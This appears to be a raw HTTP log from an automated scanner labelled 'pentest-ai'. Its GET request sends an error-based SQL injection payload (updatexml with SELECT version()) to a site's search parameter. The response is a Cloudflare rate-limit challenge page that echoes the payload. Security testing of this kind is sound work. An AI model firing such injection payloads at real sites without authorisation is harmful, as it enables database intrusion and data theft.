REQUEST:
GET https://my.myfirst.tech/search?q=1%27%20AND%20updatexml%281%2Cconcat%280x7e%2C%28SELECT%20version%28%29%29%29%2C1%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:38:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9516
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84619ff58a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=V37HV9lbj2V4ZowXtv49VMMMZBZG6KwkXCL00eY5K9fFNqlreyPjutG5EyPDmmPlR0%2F9RD4Dglkzr8iGx%2F46GQBNPfOEEflIOuSHlTBd6bnNTgiMJtnRXq2Hzz7z%2FXqsvSYU%2BbteRhf47h6WYA%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84619ff58a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'TNXQfztZurLScEEa9h3.zLt9JO8gSgym9X.kYxRIwA4-1784281107-1.2.1.1-k6CoHUQB30KEHFvwFQZCbavD54SaLHR5h2JETOqir.xUvfVws0kcCi06R8ZKxf5.',cITimeS: '1784281107',cRay: 'a1c84619ff58a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?q=1%27+AND+updatexml%281%2Cconcat%280x7e%2C%28SELECT+version%28%29%29%29%2C1%29--\u0026__cf_chl_tk=A66AW8lOrp1Jo6DxZlUUXclHh3FCrT_TBw_KilP1occ-1784281107-1.0.1.1-oBbml22Dmy_YEaY1wvG5Uoyu4QwsnTaWfxxUwPHTAUg",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?q=1%27+AND+updatexml%281%2Cconcat%280x7e%2C%28SELECT+version%28%29%29%29%2C1%29--\u0026__cf_chl_f_tk=A66AW8lOrp1Jo6DxZlUUXclHh3FCrT_TBw_KilP1occ-1784281107-1.0.1.1-oBbml22Dmy_YEaY1wvG5Uoyu4QwsnTaWfxxUwPHTAUg",md: 'gnRMzS3xNEbzf4dzUTqZhHd3FcTLGf5vrwFpgwGL.TY-1784281107-1.2.1.1-isiTXuTJjJyqhC8QIwjcmiiga2UevKQ2blQX8sQkJOF7ovsi6sisqJ0XCLjoG0cFpEJhPbpc2FVhGyCk3IYeOuLCjzNoCt0C3dAInEagpHlJlaYbGYsbp7Cd9W_gxNptBkOm8pRqj4GVuxb4WLGHmOlyKaGsao8c6I6oML9QoTOTuPW70lgR2KgB2NfyfFqkhU.x47QXECTu.ciY9FrkAEae3SoaXH4VSg4SgnvwmWvbH4yOh.PFl3Wo0fHzQmDg15jCp_9DMSjNxM9aaLruAOIzdL4_RdTnvvcT.YtmbfQ3Yt7sNywbPvAwX3tJn50TSO4.bwJRpD_rCobsE2.WM8YdEVSop5BnQRfZL5qt8aw5KV4GwQeN1CKzFIrtix2gNSR53o1yQ0gBqdOIsbbs004SLy5r3rfe42UeOVPIabt7JiH9IYoeH6eza.W2PUBRxPTHjBlyHCeLewH.IYh.AX0dmZkZDBQooifYTXwJ8TutLY_dbt8RF6XeRBdwsDyUIBa4b4bgiqaxFM94lx8dHfBPM7wBeHetnwhyd7syhQkc7fxwkc9zOfaRJx8JbXHVfz1RJPqh_XNlmDBIdJjaylnoNot.ynsEAkjFlRVRjaw2flpmajh2fPN939uaV9vtaQbBvi9udcxlCLwsKn1AfqP7ibC96qDULjcA9Xw1mBGFyMPJLHTAiUCa2Nq6xCGxLUiHQmj9tQJGIoUGSbOpY4z_.BsriFc1LiZpGulzJuxA5Mj5zJMUqXY5v2sKjVVUnKynChBoO0xnEycJWnjUwDm.j0n_fop.SmEnJpnoUqYVUfSrgAOtb3Fj.OTpBm1QO8gDOTWXu4evD95BLPqe5951onnJzgm_9YqzzGmOqYYl_pUFdy1xI0IxwCgcDUcS1pnOYfu6HPs7zM8lQTUo6M41V8hXAPqdyz2kgBHFn1vkKPtLq66PPB1uR1MXW_Z3QveAsw74L1ist9cBw07A0SsHP5Chjbv9.AjzrBRYJ2jhTJ2Hd1jXnFRWsFkNEMZ3WekhOAGM1Rjqp0oNUF0ekO9YP3YWHjiOAOkCmG8_F634KGjrNdhjXJ4DcabHYF4XLGyf6CoaqHuj7RzV9lSaoDrT1SKME7RkSJhe.ONnGReSiGfiiiRgCyee7btJqw9kyFaJoLFbyLc_pxjmplg1ZAMgC_Sdm16ZpJYTYlwBld5IZSzUUjLTU1UHmR0JeNm4R0gDRhN1rGeUqeyfEiavdg',mdrd: 'c8kmkXRWjjddpNabtBqDlniHe3BKG9Z7EZOpkuX71VE-1784281107-1.2.1.1-7nn0XFxpgdWXnlTDYhHnagg8Qo0kcXgxEwFZzxXW4cG_tvSSFJeI7NAQvKUrR9tKMwSG.CB0itaPB_Oew7NxnQXznR7TQ7DrzAGr8KaSIfOf5dArn4dA5D.tY3NaQ7wG3DaxRsYKARnUKwU7jQg.ahwxS9qb7PTgKZjsny1nR3dpkw3.gqm5fhmfHtfqW7c.MlT6DhG4wwCstAFZB6x8eojmaT.eAi7OOqwmUqizeX.Wms3XPbKeFrfTL6AnbCZl',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84619ff58a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?q=1%27+AND+updatexml%281%2Cconcat%280x7e%2C%28SELECT+version%28%29%29%29%2C1%29--\u0026__cf_chl_rt_tk=A66AW8lOrp1Jo6DxZlUUXclHh3FCrT_TBw_KilP1occ-1784281107-1.0.1.1-oBbml22Dmy_YEaY1wvG5Uoyu4QwsnTaWfxxUwPHTAUg"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
